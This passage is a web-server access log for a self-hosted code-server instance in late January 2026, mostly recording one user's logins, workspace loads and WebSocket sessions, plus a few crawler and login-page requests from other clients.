"https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:07:29:16 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:07:29:17 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt/service_finder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:07:29:20 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[28/Jan/2026:11:25:24 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 44.196.29.182] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[28/Jan/2026:11:25:24 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 44.196.29.182] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[28/Jan/2026:12:31:24 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=ceeb9d9b-6477-498f-a6a7-6560cd533dab&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1335313] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:12:31:24 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=83456df2-ccb6-47a5-a316-311bb31e7366&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 434869] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:16:10:44 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 44.196.29.182] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0" "-" +[28/Jan/2026:16:10:44 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 44.196.29.182] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0" "-" +[28/Jan/2026:23:33:55 +0000] - 401 401 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js" [Client 37.76.10.148] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[28/Jan/2026:23:33:55 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.10.148] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[28/Jan/2026:23:33:55 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.10.148] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/config/workspace" +[28/Jan/2026:23:33:57 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.10.148] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[28/Jan/2026:23:34:26 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.10.148] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[29/Jan/2026:06:45:07 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:45:07 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:45:07 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[29/Jan/2026:06:45:08 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[29/Jan/2026:06:45:10 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[29/Jan/2026:06:45:10 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[29/Jan/2026:06:45:10 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[29/Jan/2026:06:45:12 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[29/Jan/2026:06:45:13 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 84.1.26.27] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[29/Jan/2026:06:45:13 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[29/Jan/2026:06:45:13 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt/service_finder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[29/Jan/2026:06:45:17 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:06:45:17 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:06:45:17 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:06:45:18 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:06:45:18 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:06:45:20 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:06:45:21 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=a1dced89-b538-4f62-8b29-2cc56ced0f5f" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:06:45:32 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[29/Jan/2026:08:15:43 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=75b390ac-a009-44ff-aa93-f3b2de2d7381&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 93905] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:15:43 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=be6bb2b3-39eb-4b76-93c7-fe54925b6844&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 917533] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:15:56 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=be6bb2b3-39eb-4b76-93c7-fe54925b6844&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1042] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:15:56 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=75b390ac-a009-44ff-aa93-f3b2de2d7381&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1773] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:17:11 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=be6bb2b3-39eb-4b76-93c7-fe54925b6844&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1487] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:17:11 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=75b390ac-a009-44ff-aa93-f3b2de2d7381&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1669] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:19:50 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=75b390ac-a009-44ff-aa93-f3b2de2d7381&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 189] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:10:45:50 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fpython%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:12:13:31 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fdotenv%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 114] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:12:13:31 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fdotenv%2Fsyntaxes%2Fdotenv.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 820] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:12:45:22 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:13:41:34 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fhtml%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 674] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:13:41:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fhtml%2Fsyntaxes%2Fhtml-derivative.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 636] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:13:41:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fhtml%2Fsyntaxes%2Fhtml.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 12394] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:13:41:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fjavascript%2Fsyntaxes%2FJavaScript.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 16121] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:13:41:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fcss%2Fsyntaxes%2Fcss.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 15018] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:13:41:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftypescript-basics%2Fsyntaxes%2Fjsdoc.js.injection.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 215] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:13:41:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftypescript-basics%2Fsyntaxes%2FTypeScript.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 15560] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:13:41:35 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftypescript-basics%2Fsyntaxes%2Fjsdoc.ts.injection.tmLanguage.json&tkn=" [Client 84.1.26.27] [Length 211] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[29/Jan/2026:15:27:52 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=be6bb2b3-39eb-4b76-93c7-fe54925b6844&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 530592] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:15:27:53 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=75b390ac-a009-44ff-aa93-f3b2de2d7381&reconnection=true&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 603042] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[30/Jan/2026:01:56:57 +0000] - 200 200 - GET https code.profibot.hu "/robots.txt" [Client 74.7.175.129] [Length 26] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[30/Jan/2026:03:24:23 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.89] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[30/Jan/2026:03:24:24 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.89] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[30/Jan/2026:05:01:32 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.228] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[30/Jan/2026:05:01:32 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.228] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[30/Jan/2026:14:11:14 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[30/Jan/2026:14:11:15 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[30/Jan/2026:14:11:15 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[30/Jan/2026:14:11:15 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[30/Jan/2026:14:11:17 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[31/Jan/2026:10:06:56 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 37.76.43.179] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:06:56 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 37.76.43.179] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:06:57 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 37.76.43.179] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:10:06:57 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 37.76.43.179] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:10:06:58 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.43.179] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:10:06:58 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.43.179] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:10:06:58 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 37.76.43.179] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:10:06:59 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.43.179] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[31/Jan/2026:10:07:27 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.43.179] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[31/Jan/2026:13:34:57 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 54.174.218.49] [Length 29] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[31/Jan/2026:13:34:57 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 54.174.218.49] [Length 1038] 